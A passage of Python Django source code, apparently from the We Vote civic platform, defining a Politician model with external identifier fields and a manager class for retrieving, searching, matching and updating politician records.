gender = models.CharField("gender", max_length=1, choices=GENDER_CHOICES, default=UNKNOWN)
birth_date = models.DateField("birth date", default=None, null=True, blank=True)
# race = enum?
# official_image_id = ??
bioguide_id = models.CharField(verbose_name="bioguide unique identifier",
max_length=200, null=True, unique=True)
thomas_id = models.CharField(verbose_name="thomas unique identifier",
max_length=200, null=True, unique=True)
lis_id = models.CharField(verbose_name="lis unique identifier",
max_length=200, null=True, blank=True, unique=False)
govtrack_id = models.CharField(verbose_name="govtrack unique identifier",
max_length=200, null=True, unique=True)
opensecrets_id = models.CharField(verbose_name="opensecrets unique identifier",
max_length=200, null=True, unique=False)
vote_smart_id = models.CharField(verbose_name="votesmart unique identifier",
max_length=200, null=True, unique=False)
fec_id = models.CharField(verbose_name="fec unique identifier",
max_length=200, null=True, unique=True, blank=True)
cspan_id = models.CharField(verbose_name="cspan unique identifier",
max_length=200, null=True, blank=True, unique=False)
wikipedia_id = models.CharField(verbose_name="wikipedia url",
max_length=500, default=None, null=True, blank=True)
ballotpedia_id = models.CharField(verbose_name="ballotpedia url",
max_length=500, default=None, null=True, blank=True)
house_history_id = models.CharField(verbose_name="house history unique identifier",
max_length=200, null=True, blank=True)
maplight_id = models.CharField(verbose_name="maplight unique identifier",
max_length=200, null=True, unique=True, blank=True)
washington_post_id = models.CharField(verbose_name="washington post unique identifier",
max_length=200, null=True, unique=False)
icpsr_id = models.CharField(verbose_name="icpsr unique identifier",
max_length=200, null=True, unique=False)
tag_link = models.ManyToManyField(Tag, through='PoliticianTagLink')
# The full name of the party the official belongs to.
political_party = models.CharField(verbose_name="politician political party", max_length=255, null=True)
state_code = models.CharField(verbose_name="politician home state", max_length=2, null=True)
politician_url = models.URLField(
verbose_name='latest website url of politician', max_length=255, blank=True, null=True)
politician_twitter_handle = models.CharField(
verbose_name='politician twitter screen_name', max_length=255, null=True, unique=False)
vote_usa_politician_id = models.CharField(
verbose_name="Vote USA permanent id for this candidate", max_length=64, default=None, null=True, blank=True)
we_vote_hosted_profile_image_url_large = models.URLField(verbose_name='we vote hosted large image url',
blank=True, null=True)
we_vote_hosted_profile_image_url_medium = models.URLField(verbose_name='we vote hosted medium image url',
blank=True, null=True)
we_vote_hosted_profile_image_url_tiny = models.URLField(verbose_name='we vote hosted tiny image url',
blank=True, null=True)
# ctcl politician fields
ctcl_uuid = models.CharField(verbose_name="ctcl uuid", max_length=36, null=True, blank=True)
politician_facebook_id = models.CharField(verbose_name='politician facebook user name', max_length=255, null=True,
unique=False)
politician_phone_number = models.CharField(verbose_name='politician phone number', max_length=255, null=True,
unique=False)
politician_googleplus_id = models.CharField(verbose_name='politician googleplus profile name', max_length=255,
null=True, unique=False)
politician_youtube_id = models.CharField(verbose_name='politician youtube profile name', max_length=255, null=True,
unique=False)
politician_email_address = models.CharField(verbose_name='politician email address', max_length=80, null=True,
unique=False)
date_last_updated = models.DateTimeField(null=True, auto_now=True)
# We override the save function so we can auto-generate we_vote_id
def save(self, *args, **kwargs):
# Even if this data came from another source we still need a unique we_vote_id
if self.we_vote_id:
self.we_vote_id = self.we_vote_id.strip().lower()
if self.we_vote_id == "" or self.we_vote_id is None: # If there isn't a value...
# ...generate a new id
site_unique_id_prefix = fetch_site_unique_id_prefix()
next_local_integer = fetch_next_we_vote_id_politician_integer()
# "wv" = We Vote
# site_unique_id_prefix = a generated (or assigned) unique id for one server running We Vote
# "pol" = tells us this is a unique id for a Politician
# next_integer = a unique, sequential integer for this server - not necessarily tied to database id
self.we_vote_id = "wv{site_unique_id_prefix}pol{next_integer}".format(
site_unique_id_prefix=site_unique_id_prefix,
next_integer=next_local_integer,
)
if self.maplight_id == "": # We want this to be unique IF there is a value, and otherwise "None"
self.maplight_id = None
super(Politician, self).save(*args, **kwargs)
def __unicode__(self):
return self.last_name
class Meta:
ordering = ('last_name',)
def display_full_name(self):
if self.politician_name:
return self.politician_name
elif self.first_name and self.last_name:
return self.first_name + " " + self.last_name
elif self.google_civic_candidate_name:
return self.google_civic_candidate_name
else:
return self.first_name + " " + self.last_name
def politician_photo_url(self):
"""
fetch URL of politician's photo from TheUnitedStatesIo repo
"""
if self.bioguide_id:
url_str = 'https://theunitedstates.io/images/congress/225x275/{bioguide_id}.jpg'.format(
bioguide_id=self.bioguide_id)
return url_str
else:
return ""
def is_female(self):
return self.gender in [FEMALE]
def is_gender_neutral(self):
return self.gender in [GENDER_NEUTRAL]
def is_male(self):
return self.gender in [MALE]
def is_gender_specified(self):
return self.gender in [FEMALE, GENDER_NEUTRAL, MALE]
class PoliticiansAreNotDuplicates(models.Model):
"""
When checking for duplicates, there are times when we want to explicitly mark two politicians as NOT duplicates
"""
politician1_we_vote_id = models.CharField(
verbose_name="first politician we are tracking", max_length=255, null=True, unique=False)
politician2_we_vote_id = models.CharField(
verbose_name="second politician we are tracking", max_length=255, null=True, unique=False)
def fetch_other_politician_we_vote_id(self, one_we_vote_id):
if one_we_vote_id == self.politician1_we_vote_id:
return self.politician2_we_vote_id
elif one_we_vote_id == self.politician2_we_vote_id:
return self.politician1_we_vote_id
else:
# If the we_vote_id passed in wasn't found, don't return another we_vote_id
return ""
class PoliticianManager(models.Manager):
def __init__(self):
pass
def politician_photo_url(self, politician_id):
politician_manager = PoliticianManager()
results = politician_manager.retrieve_politician(politician_id)
if results['success']:
politician = results['politician']
return politician.politician_photo_url()
return ""
def retrieve_politician(self, politician_id=0, we_vote_id=None, read_only=False):
error_result = False
exception_does_not_exist = False
exception_multiple_object_returned = False
politician = None
politician_found = False
politician_id = 0
politician_we_vote_id = ""
success = True
status = ''
try:
if positive_value_exists(politician_id):
if positive_value_exists(read_only):
politician = Politician.objects.using('readonly').get(id=politician_id)
else:
politician = Politician.objects.get(id=politician_id)
politician_id = politician.id
politician_we_vote_id = politician.we_vote_id
politician_found = True
elif positive_value_exists(we_vote_id):
if positive_value_exists(read_only):
politician = Politician.objects.using('readonly').get(we_vote_id__iexact=we_vote_id)
else:
politician = Politician.objects.get(we_vote_id__iexact=we_vote_id)
politician_id = politician.id
politician_we_vote_id = politician.we_vote_id
politician_found = True
except Politician.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
error_result = True
exception_multiple_object_returned = True
success = False
status += "MULTIPLE_POLITICIANS_FOUND "
except Politician.DoesNotExist:
error_result = True
exception_does_not_exist = True
status += "NO_POLITICIAN_FOUND "
except Exception as e:
success = False
status += "PROBLEM_WITH_RETRIEVE_POLITICIAN: " + str(e) + ' '
results = {
'success': success,
'status': status,
'politician': politician,
'politician_found': politician_found,
'politician_id': politician_id,
'politician_we_vote_id': politician_we_vote_id,
'error_result': error_result,
'DoesNotExist': exception_does_not_exist,
'MultipleObjectsReturned': exception_multiple_object_returned,
}
return results
def retrieve_politician_from_we_vote_id(self, politician_we_vote_id):
return self.retrieve_politician(0, politician_we_vote_id)
def retrieve_all_politicians_that_might_match_candidate(
self,
candidate_name='',
candidate_twitter_handle='',
google_civic_candidate_name='',
google_civic_candidate_name2='',
google_civic_candidate_name3='',
maplight_id='',
state_code='',
vote_smart_id='',
vote_usa_politician_id='',
):
politician_list = []
politician_list_found = False
politician = Politician()
politician_found = False
status = ''
try:
filter_set = False
politician_queryset = Politician.objects.all()
filters = []
if positive_value_exists(vote_smart_id):
new_filter = Q(vote_smart_id__iexact=vote_smart_id)
filter_set = True
filters.append(new_filter)
if positive_value_exists(vote_usa_politician_id):
new_filter = Q(vote_usa_politician_id__iexact=vote_usa_politician_id)
filter_set = True
filters.append(new_filter)
if positive_value_exists(maplight_id):
new_filter = Q(maplight_id__iexact=maplight_id)
filter_set = True
filters.append(new_filter)
if positive_value_exists(candidate_twitter_handle):
new_filter = Q(politician_twitter_handle__iexact=candidate_twitter_handle)
filter_set = True
filters.append(new_filter)
if positive_value_exists(candidate_name) and positive_value_exists(state_code):
new_filter = Q(politician_name__iexact=candidate_name,
state_code__iexact=state_code)
filter_set = True
filters.append(new_filter)
if positive_value_exists(google_civic_candidate_name) and positive_value_exists(state_code):
new_filter = Q(politician_name__iexact=google_civic_candidate_name,
state_code__iexact=state_code)
filter_set = True
filters.append(new_filter)
if positive_value_exists(google_civic_candidate_name2) and positive_value_exists(state_code):
new_filter = Q(politician_name__iexact=google_civic_candidate_name2,
state_code__iexact=state_code)
filter_set = True
filters.append(new_filter)
if positive_value_exists(google_civic_candidate_name3) and positive_value_exists(state_code):
new_filter = Q(politician_name__iexact=google_civic_candidate_name3,
state_code__iexact=state_code)
filter_set = True
filters.append(new_filter)
# Add the first query
if len(filters):
final_filters = filters.pop()
# ...and "OR" the remaining items in the list
for item in filters:
final_filters |= item
politician_queryset = politician_queryset.filter(final_filters)
if filter_set:
politician_list = politician_queryset
else:
politician_list = []
if len(politician_list) == 1:
politician_found = True
politician_list_found = False
politician = politician_list[0]
status += 'ONE_POLITICIAN_RETRIEVED '
elif len(politician_list):
politician_found = False
politician_list_found = True
status += 'POLITICIAN_LIST_RETRIEVED '
else:
status += 'NO_POLITICIANS_RETRIEVED '
success = True
except Exception as e:
status = 'FAILED retrieve_all_politicians_for_office ' \
'{error} [type: {error_type}]'.format(error=e, error_type=type(e))
success = False
# TODO DALE If nothing found, look for a national entry for this candidate -- i.e. Presidential candidates
if not politician_found and not politician_list_found:
pass
results = {
'success': success,
'status': status,
'politician_list_found': politician_list_found,
'politician_list': politician_list,
'politician_found': politician_found,
'politician': politician,
}
return results
def reset_politician_image_details_from_candidate(self, candidate, twitter_profile_image_url_https,
twitter_profile_background_image_url_https,
twitter_profile_banner_url_https):
"""
Reset an Politician entry with original image details from we vote image.
:param candidate:
:param twitter_profile_image_url_https:
:param twitter_profile_background_image_url_https:
:param twitter_profile_banner_url_https:
:return:
"""
politician_details = self.retrieve_politician(0, candidate.politician_we_vote_id)
politician = politician_details['politician']
if politician_details['success']:
politician.we_vote_hosted_profile_image_url_medium = ''
politician.we_vote_hosted_profile_image_url_large = ''
politician.we_vote_hosted_profile_image_url_tiny = ''
politician.save()
success = True
status = "RESET_POLITICIAN_IMAGE_DETAILS"
else:
success = False
status = "POLITICIAN_NOT_FOUND_IN_RESET_IMAGE_DETAILS"
results = {
'success': success,
'status': status,
'politician': politician
}
return results
def search_politicians(self, name_search_terms=None):
status = ""
success = True
politician_search_results_list = []
try:
queryset = Politician.objects.all()
if name_search_terms is not None:
name_search_words = name_search_terms.split()
else:
name_search_words = []
for one_word in name_search_words:
filters = [] # Reset for each search word
new_filter = Q(politician_name__icontains=one_word)
filters.append(new_filter)
new_filter = Q(politician_twitter_handle__icontains=one_word)
filters.append(new_filter)
# Add the first query
if len(filters):
final_filters = filters.pop()
# ...and "OR" the remaining items in the list
for item in filters:
final_filters |= item
queryset = queryset.filter(final_filters)
politician_search_results_list = list(queryset)
except Exception as e:
success = False
status += "ERROR_SEARCHING_POLITICIANS: " + str(e) + " "
results = {
'status': status,
'success': success,
'politician_search_results_list': politician_search_results_list,
}
return results
def update_politician_details_from_candidate(self, candidate):
"""
Update a politician entry with details retrieved from candidate
:param candidate:
:return:
"""
values_changed = False
politician_details = self.retrieve_politician(0, candidate.politician_we_vote_id)
politician = politician_details['politician']
if politician_details['success'] and politician:
# Politician found so update politician details with candidate details
first_name = extract_first_name_from_full_name(candidate.candidate_name)
middle_name = extract_middle_name_from_full_name(candidate.candidate_name)
last_name = extract_last_name_from_full_name(candidate.candidate_name)
if positive_value_exists(first_name) and first_name != politician.first_name:
politician.first_name = first_name
values_changed = True
if positive_value_exists(last_name) and last_name != politician.last_name:
politician.last_name = last_name
values_changed = True
if positive_value_exists(middle_name) and middle_name != politician.middle_name:
politician.middle_name = middle_name
values_changed = True
if positive_value_exists(candidate.party):
if convert_to_political_party_constant(candidate.party) != politician.political_party:
politician.political_party = convert_to_political_party_constant(candidate.party)
values_changed = True
if positive_value_exists(candidate.vote_smart_id) and candidate.vote_smart_id != politician.vote_smart_id:
politician.vote_smart_id = candidate.vote_smart_id
values_changed = True
if positive_value_exists(candidate.maplight_id) and candidate.maplight_id != politician.maplight_id:
politician.maplight_id = candidate.maplight_id
values_changed = True
if positive_value_exists(candidate.candidate_name) and \
candidate.candidate_name != politician.politician_name:
politician.politician_name = candidate.candidate_name
values_changed = True
if positive_value_exists(candidate.google_civic_candidate_name) and \
candidate.google_civic_candidate_name != politician.google_civic_candidate_name:
politician.google_civic_candidate_name = candidate.google_civic_candidate_name
values_changed = True
if positive_value_exists(candidate.state_code) and candidate.state_code != politician.state_code:
politician.state_code = candidate.state_code
values_changed = True
if positive_value_exists(candidate.candidate_twitter_handle) and \
candidate.candidate_twitter_handle != politician.politician_twitter_handle:
politician.politician_twitter_handle = candidate.candidate_twitter_handle
values_changed = True
if positive_value_exists(candidate.we_vote_hosted_profile_image_url_large) and \
candidate.we_vote_hosted_profile_image_url_large != \
politician.we_vote_hosted_profile_image_url_large:
politician.we_vote_hosted_profile_image_url_large = candidate.we_vote_hosted_profile_image_url_large
values_changed = True
if positive_value_exists(candidate.we_vote_hosted_profile_image_url_medium) and \
candidate.we_vote_hosted_profile_image_url_medium != \
politician.we_vote_hosted_profile_image_url_medium:
politician.we_vote_hosted_profile_image_url_medium = candidate.we_vote_hosted_profile_image_url_medium
values_changed = True
if positive_value_exists(candidate.we_vote_hosted_profile_image_url_tiny) and \
candidate.we_vote_hosted_profile_image_url_tiny != politician.we_vote_hosted_profile_image_url_tiny:
politician.we_vote_hosted_profile_image_url_tiny = candidate.we_vote_hosted_profile_image_url_tiny
values_changed = True
if values_changed:
politician.save()
success = True
status = "SAVED_POLITICIAN_DETAILS"
else:
success = True
status = "NO_CHANGES_SAVED_TO_POLITICIAN_DETAILS"
else:
success = False
status = "POLITICIAN_NOT_FOUND"
results = {
'success': success,
'status': status,
'politician': politician
}
return results
def update_or_create_politician_from_candidate(self, candidate):
"""
Take a We Vote candidate object, and map it to update_or_create_politician
:param candidate:
:return:
"""
first_name = extract_first_name_from_full_name(candidate.candidate_name)
middle_name = extract_middle_name_from_full_name(candidate.candidate_name)
last_name = extract_last_name_from_full_name(candidate.candidate_name)
political_party = convert_to_political_party_constant(candidate.party)
# TODO Add all other identifiers from other systems
updated_politician_values = {
'vote_smart_id': candidate.vote_smart_id,
'vote_usa_politician_id': candidate.vote_usa_politician_id,
'maplight_id': candidate.maplight_id,
'politician_name': candidate.candidate_name,
'google_civic_candidate_name': candidate.google_civic_candidate_name,
'state_code': candidate.state_code,
'politician_twitter_handle': candidate.candidate_twitter_handle,
'we_vote_hosted_profile_image_url_large': candidate.we_vote_hosted_profile_image_url_large,
'we_vote_hosted_profile_image_url_medium': candidate.we_vote_hosted_profile_image_url_medium,
'we_vote_hosted_profile_image_url_tiny': candidate.we_vote_hosted_profile_image_url_tiny,
'first_name': first_name,
'middle_name': middle_name,
'last_name': last_name,
'political_party': political_party,
}
return self.update_or_create_politician(
updated_politician_values=updated_politician_values,
politician_we_vote_id=candidate.politician_we_vote_id,
vote_usa_politician_id=candidate.vote_usa_politician_id,
candidate_twitter_handle=candidate.candidate_twitter_handle,
candidate_name=candidate.candidate_name,
state_code=candidate.state_code)
def update_or_create_politician(
self,
updated_politician_values={},
politician_we_vote_id='',
vote_smart_id=0,
vote_usa_politician_id='',
maplight_id="",
candidate_twitter_handle="",
candidate_name="",
state_code="",
first_name="",
middle_name="",
last_name=""):
"""
Either update or create a politician entry. The individual variables passed in are for the purpose of finding
a politician to update, and the updated_politician_values variable contains the values we want to update to.
"""
new_politician_created = False
politician_found = False
politician = Politician()
status = ''
try:
# Note: When we decide to start updating candidate_name elsewhere within We Vote, we should stop
# updating candidate_name via subsequent Google Civic imports
# If coming from a record that has already been in We Vote
if positive_value_exists(politician_we_vote_id):
politician, new_politician_created = \
Politician.objects.update_or_create(
we_vote_id__iexact=politician_we_vote_id,
defaults=updated_politician_values)
politician_found = True
elif positive_value_exists(vote_smart_id):
politician, new_politician_created = \
Politician.objects.update_or_create(
vote_smart_id=vote_smart_id,
defaults=updated_politician_values)
politician_found = True
elif positive_value_exists(vote_usa_politician_id):
politician, new_politician_created = \
Politician.objects.update_or_create(
vote_usa_politician_id=vote_usa_politician_id,
defaults=updated_politician_values)
politician_found = True
elif positive_value_exists(candidate_twitter_handle):
politician, new_politician_created = \
Politician.objects.update_or_create(
politician_twitter_handle__iexact=candidate_twitter_handle,
defaults=updated_politician_values)
politician_found = True
elif positive_value_exists(candidate_name) and positive_value_exists(state_code):
state_code = state_code.lower()
politician, new_politician_created = \
Politician.objects.update_or_create(
politician_name=candidate_name,
state_code=state_code,
defaults=updated_politician_values)
politician_found = True
elif positive_value_exists(first_name) and positive_value_exists(last_name) \
and positive_value_exists(state_code):
state_code = state_code.lower()
politician, new_politician_created = \
Politician.objects.update_or_create(
first_name=first_name,
last_name=last_name,
state_code=state_code,
defaults=updated_politician_values)
politician_found = True
else:
# If here we have exhausted our set of unique identifiers
politician_found = False
pass
success = True
if politician_found:
status += 'POLITICIAN_SAVED '
else:
status += 'POLITICIAN_NOT_SAVED '
except Exception as e:
success = False
status = 'UNABLE_TO_UPDATE_OR_CREATE_POLITICIAN: ' + str(e) + ' '
results = {
'success': success,
'status': status,
'politician_created': new_politician_created,
'politician_found': politician_found,
'politician': politician,
}
return results
def fetch_politician_id_from_we_vote_id(self, we_vote_id):
politician_id = 0
politician_manager = PoliticianManager()
results = politician_manager.retrieve_politician(politician_id, we_vote_id)
if results['success']:
return results['politician_id']
return 0
def fetch_politician_we_vote_id_from_id(self, politician_id):
we_vote_id = ''
politician_manager = PoliticianManager()
results = politician_manager.retrieve_politician(politician_id, we_vote_id)
if results['success']:
return results['politician_we_vote_id']
return ''
def fetch_politicians_are_not_duplicates_list_we_vote_ids(self, politician_we_vote_id):
results = self.retrieve_politicians_are_not_duplicates_list(politician_we_vote_id)
return results['politicians_are_not_duplicates_list_we_vote_ids']
def create_politician_row_entry(self, politician_name, politician_first_name, politician_middle_name,
politician_last_name, ctcl_uuid, political_party, politician_email_address,
politician_phone_number, politician_twitter_handle, politician_facebook_id,
politician_googleplus_id, politician_youtube_id, politician_website_url):
"""
Create Politician table entry with Politician details
:param politician_name:
:param politician_first_name:
:param politician_middle_name:
:param politician_last_name:
:param ctcl_uuid:
:param political_party:
:param politician_email_address:
:param politician_phone_number:
:param politician_twitter_handle:
:param politician_facebook_id:
:param politician_googleplus_id:
:param politician_youtube_id:
:param politician_website_url:
:return:
"""
success = False
status = ""
politician_updated = False
new_politician_created = False
new_politician = ''
try:
new_politician = Politician.objects.create(politician_name=politician_name,
first_name=politician_first_name,
middle_name=politician_middle_name,
last_name=politician_last_name, political_party=political_party,
politician_email_address=politician_email_address,
politician_phone_number=politician_phone_number,
politician_twitter_handle=politician_twitter_handle,
politician_facebook_id=politician_facebook_id,
politician_googleplus_id=politician_googleplus_id,
politician_youtube_id=politician_youtube_id,
politician_url=politician_website_url, ctcl_uuid=ctcl_uuid)
if new_politician:
success = True
status += "POLITICIAN_CREATED "
new_politician_created = True
else:
success = False
status += "POLITICIAN_CREATE_FAILED "
except Exception as e:
success = False
new_politician_created = False
status += "POLITICIAN_RETRIEVE_ERROR "
handle_exception(e, logger=logger, exception_message=status)
results = {
'success': success,
'status': status,
'new_politician_created': new_politician_created,
'politician_updated': politician_updated,
'new_politician': new_politician,
}
return results
def update_politician_row_entry(self, politician_name, politician_first_name, politician_middle_name,
politician_last_name, ctcl_uuid, political_party, politician_email_address,
politician_twitter_handle, politician_phone_number, politician_facebook_id,
politician_googleplus_id, politician_youtube_id, politician_website_url,
politician_we_vote_id):
"""
Update Politician table entry with matching we_vote_id
:param politician_name:
:param politician_first_name:
:param politician_middle_name:
:param politician_last_name:
:param ctcl_uuid:
:param political_party:
:param politician_email_address:
:param politician_twitter_handle:
:param politician_phone_number:
:param politician_facebook_id:
:param politician_googleplus_id:
:param politician_youtube_id:
:param politician_website_url:
:param politician_we_vote_id:
:return:
"""
success = False
status = ""
politician_updated = False
# new_politician_created = False
# new_politician = ''
existing_politician_entry = ''
try:
existing_politician_entry = Politician.objects.get(we_vote_id__iexact=politician_we_vote_id)
if existing_politician_entry:
# found the existing entry, update the values
existing_politician_entry.politician_name = politician_name
existing_politician_entry.first_name = politician_first_name
existing_politician_entry.middle_name = politician_middle_name
existing_politician_entry.last_name = politician_last_name
existing_politician_entry.party_name = political_party
existing_politician_entry.ctcl_uuid = ctcl_uuid
existing_politician_entry.politician_phone_number = politician_phone_number
existing_politician_entry.twitter_handle = politician_twitter_handle
existing_politician_entry.politician_facebook_id = politician_facebook_id
existing_politician_entry.politician_googleplus_id = politician_googleplus_id
existing_politician_entry.politician_youtube_id = politician_youtube_id
existing_politician_entry.politician_url = politician_website_url
existing_politician_entry.politician_email_address = politician_email_address
# now go ahead and save this entry (update)
existing_politician_entry.save()
politician_updated = True
success = True
status = "POLITICIAN_UPDATED"
except Exception as e:
success = False
politician_updated = False
status = "POLITICIAN_RETRIEVE_ERROR"
handle_exception(e, logger=logger, exception_message=status)
results = {
'success': success,
'status': status,
'politician_updated': politician_updated,
'updated_politician': existing_politician_entry,
}
return results
# def delete_all_politician_data():
# with open(LEGISLATORS_CURRENT_FILE, 'rU') as politicians_current_data:
# politicians_current_data.readline() # Skip the header
# reader = csv.reader(politicians_current_data) # Create a regular tuple reader
# for index, politician_row in enumerate(reader):
# if index > 3:
# break
# politician_entry = Politician.objects.order_by('last_name')[0]
# politician_entry.delete()
def retrieve_politicians(
self,
limit_to_this_state_code="",
read_only=False,
):
"""
:param limit_to_this_state_code:
:param read_only:
:return:
"""
status = ""
politician_list = []
politician_list_found = False
try:
if positive_value_exists(read_only):
politician_query = Politician.objects.using('readonly').all()
else:
politician_query = Politician.objects.all()
if positive_value_exists(limit_to_this_state_code):
politician_query = politician_query.filter(state_code__iexact=limit_to_this_state_code)
politician_list = list(politician_query)
if len(politician_list):
politician_list_found = True
status += 'POLITICIANS_RETRIEVED '
success = True
else:
status += 'NO_POLITICIANS_RETRIEVED '
success = True
except Politician.DoesNotExist:
# No politicians found. Not a problem.
status += 'NO_POLITICIANS_FOUND_DoesNotExist '
politician_list_objects = []
success = True
except Exception as e:
handle_exception(e, logger=logger)
status += 'FAILED-retrieve_politicians_for_specific_elections: ' + str(e) + ' '
success = False
results = {
'success': success,
'status': status,
'politician_list_found': politician_list_found,
'politician_list': politician_list,
}
return results
def retrieve_politicians_from_non_unique_identifiers(
self,
state_code='',
politician_twitter_handle='',
politician_name='',
ignore_politician_id_list=[],
read_only=False):
"""
:param state_code:
:param politician_twitter_handle:
:param politician_name:
:param ignore_politician_id_list:
:param read_only:
:return:
"""
keep_looking_for_duplicates = True
politician = None
politician_found = False
politician_list = []
politician_list_found = False
politician_twitter_handle = extract_twitter_handle_from_text_string(politician_twitter_handle)
multiple_entries_found = False
success = True
status = ""
if keep_looking_for_duplicates and positive_value_exists(politician_twitter_handle):
try:
if positive_value_exists(read_only):
politician_query = Politician.objects.using('readonly').all()
else:
politician_query = Politician.objects.all()
politician_query = politician_query.filter(politician_twitter_handle__iexact=politician_twitter_handle)
if positive_value_exists(state_code):
politician_query = politician_query.filter(state_code__iexact=state_code)
if positive_value_exists(ignore_politician_id_list):
politician_query = politician_query.exclude(we_vote_id__in=ignore_politician_id_list)
politician_list = list(politician_query)
if len(politician_list):
# At least one entry exists
status += 'RETRIEVE_POLITICIANS_FROM_NON_UNIQUE-POLITICIAN_LIST_RETRIEVED '
# if a single entry matches, update that entry
if len(politician_list) == 1:
multiple_entries_found = False
politician = politician_list[0]
politician_found = True
keep_looking_for_duplicates = False
success = True
status += "POLITICIAN_FOUND_BY_TWITTER "
else:
# more than one entry found
politician_list_found = True
multiple_entries_found = True
keep_looking_for_duplicates = False # Deal with multiple Twitter duplicates manually
status += "MULTIPLE_TWITTER_MATCHES "
except Politician.DoesNotExist:
success = True
status += "RETRIEVE_POLITICIANS_FROM_NON_UNIQUE-POLITICIAN_NOT_FOUND "
except Exception as e:
status += "RETRIEVE_POLITICIANS_FROM_NON_UNIQUE-POLITICIAN_QUERY_FAILED1 " + str(e) + " "
success = False
keep_looking_for_duplicates = False
# twitter handle does not exist, next look up against other data that might match
if keep_looking_for_duplicates and positive_value_exists(politician_name):
# Search by Candidate name exact match
try:
if positive_value_exists(read_only):
politician_query = Politician.objects.using('readonly').all()
else:
politician_query = Politician.objects.all()
politician_query = politician_query.filter(
Q(politician_name__iexact=politician_name) |
Q(google_civic_candidate_name__iexact=politician_name) |
Q(google_civic_candidate_name2__iexact=politician_name) |
Q(google_civic_candidate_name3__iexact=politician_name)
)
if positive_value_exists(state_code):
politician_query = politician_query.filter(state_code__iexact=state_code)
if positive_value_exists(ignore_politician_id_list):
politician_query = politician_query.exclude(we_vote_id__in=ignore_politician_id_list)
politician_list = list(politician_query)
if len(politician_list):
# entry exists
status += 'POLITICIAN_ENTRY_EXISTS1 '
success = True
# if a single entry matches, update that entry
if len(politician_list) == 1:
politician = politician_list[0]
politician_found = True
status += politician.we_vote_id + " "
keep_looking_for_duplicates = False
else:
# more than one entry found with a match in Politician
politician_list_found = True
keep_looking_for_duplicates = False
multiple_entries_found = True
else:
success = True
status += 'POLITICIAN_ENTRY_NOT_FOUND-EXACT '
except Politician.DoesNotExist:
success = True
status += "RETRIEVE_POLITICIANS_FROM_NON_UNIQUE-POLITICIAN_NOT_FOUND-EXACT_MATCH "
except Exception as e:
status += "RETRIEVE_POLITICIANS_FROM_NON_UNIQUE-POLITICIAN_QUERY_FAILED2: " + str(e) + " "
success = False
if keep_looking_for_duplicates and positive_value_exists(politician_name):
# Search for Candidate(s) that contains the same first and last names
first_name = extract_first_name_from_full_name(politician_name)
last_name = extract_last_name_from_full_name(politician_name)
if positive_value_exists(first_name) and positive_value_exists(last_name):
try:
if positive_value_exists(read_only):
politician_query = Politician.objects.using('readonly').all()
else:
politician_query = Politician.objects.all()
politician_query = politician_query.filter(
(Q(politician_name__icontains=first_name) & Q(politician_name__icontains=last_name)) |
(Q(google_civic_candidate_name__icontains=first_name) &
Q(google_civic_candidate_name__icontains=last_name)) |
(Q(google_civic_candidate_name2__icontains=first_name) &
Q(google_civic_candidate_name2__icontains=last_name)) |
(Q(google_civic_candidate_name3__icontains=first_name) &
Q(google_civic_candidate_name3__icontains=last_name))
)
if positive_value_exists(state_code):
politician_query = politician_query.filter(state_code__iexact=state_code)
if positive_value_exists(ignore_politician_id_list):
politician_query = politician_query.exclude(we_vote_id__in=ignore_politician_id_list)
politician_list = list(politician_query)
if len(politician_list):
# entry exists
status += 'POLITICIAN_ENTRY_EXISTS2 '
success = True
# if a single entry matches, update that entry
if len(politician_list) == 1:
politician = politician_list[0]
politician_found = True
status += politician.we_vote_id + " "
keep_looking_for_duplicates = False
else:
# more than one entry found with a match in Politician
politician_list_found = True
keep_looking_for_duplicates = False
multiple_entries_found = True
else:
status += 'POLITICIAN_ENTRY_NOT_FOUND-FIRST_OR_LAST '
success = True
except Politician.DoesNotExist:
status += "RETRIEVE_POLITICIANS_FROM_NON_UNIQUE-POLITICIAN_NOT_FOUND-FIRST_OR_LAST_NAME "
success = True
except Exception as e:
status += "RETRIEVE_POLITICIANS_FROM_NON_UNIQUE-POLITICIAN_QUERY_FAILED3: " + str(e) + " "
success = False
results = {
'success': success,
'status': status,
'politician_found': politician_found,
'politician': politician,
'politician_list_found': politician_list_found,
'politician_list': politician_list,
'multiple_entries_found': multiple_entries_found,
}
return results
def fetch_politicians_from_non_unique_identifiers_count(
self,
state_code='',
politician_twitter_handle='',
politician_name='',
ignore_politician_id_list=[]):
keep_looking_for_duplicates = True
politician_twitter_handle = extract_twitter_handle_from_text_string(politician_twitter_handle)
status = ""
if keep_looking_for_duplicates and positive_value_exists(politician_twitter_handle):
try:
politician_query = Politician.objects.all()
politician_query = politician_query.filter(politician_twitter_handle__iexact=politician_twitter_handle)
if positive_value_exists(state_code):
politician_query = politician_query.filter(state_code__iexact=state_code)
if positive_value_exists(ignore_politician_id_list):
politician_query = politician_query.exclude(we_vote_id__in=ignore_politician_id_list)
politician_count = politician_query.count()
if positive_value_exists(politician_count):
return politician_count
except Politician.DoesNotExist:
status += "FETCH_POLITICIANS_FROM_NON_UNIQUE_IDENTIFIERS_COUNT1 "
# twitter handle does not exist, next look up against other data that might match
if keep_looking_for_duplicates and positive_value_exists(politician_name):
# Search by Candidate name exact match
try:
politician_query = Politician.objects.all()
politician_query = politician_query.filter(
Q(politician_name__iexact=politician_name) |
Q(google_civic_candidate_name__iexact=politician_name) |
Q(google_civic_candidate_name2__iexact=politician_name) |
Q(google_civic_candidate_name3__iexact=politician_name)
)
if positive_value_exists(state_code):
politician_query = politician_query.filter(state_code__iexact=state_code)
if positive_value_exists(ignore_politician_id_list):
politician_query = politician_query.exclude(we_vote_id__in=ignore_politician_id_list)
politician_count = politician_query.count()
if positive_value_exists(politician_count):
return politician_count
except Politician.DoesNotExist:
status += "FETCH_POLITICIANS_FROM_NON_UNIQUE_IDENTIFIERS_COUNT2 "
if keep_looking_for_duplicates and positive_value_exists(politician_name):
# Search for Candidate(s) that contains the same first and last names
first_name = extract_first_name_from_full_name(politician_name)
last_name = extract_last_name_from_full_name(politician_name)
if positive_value_exists(first_name) and positive_value_exists(last_name):
try:
politician_query = Politician.objects.all()
politician_query = politician_query.filter(
(Q(politician_name__icontains=first_name) & Q(politician_name__icontains=last_name)) |
(Q(google_civic_candidate_name__icontains=first_name) &
Q(google_civic_candidate_name__icontains=last_name)) |
(Q(google_civic_candidate_name2__icontains=first_name) &
Q(google_civic_candidate_name2__icontains=last_name)) |
(Q(google_civic_candidate_name3__icontains=first_name) &
Q(google_civic_candidate_name3__icontains=last_name))
)
if positive_value_exists(state_code):
politician_query = politician_query.filter(state_code__iexact=state_code)
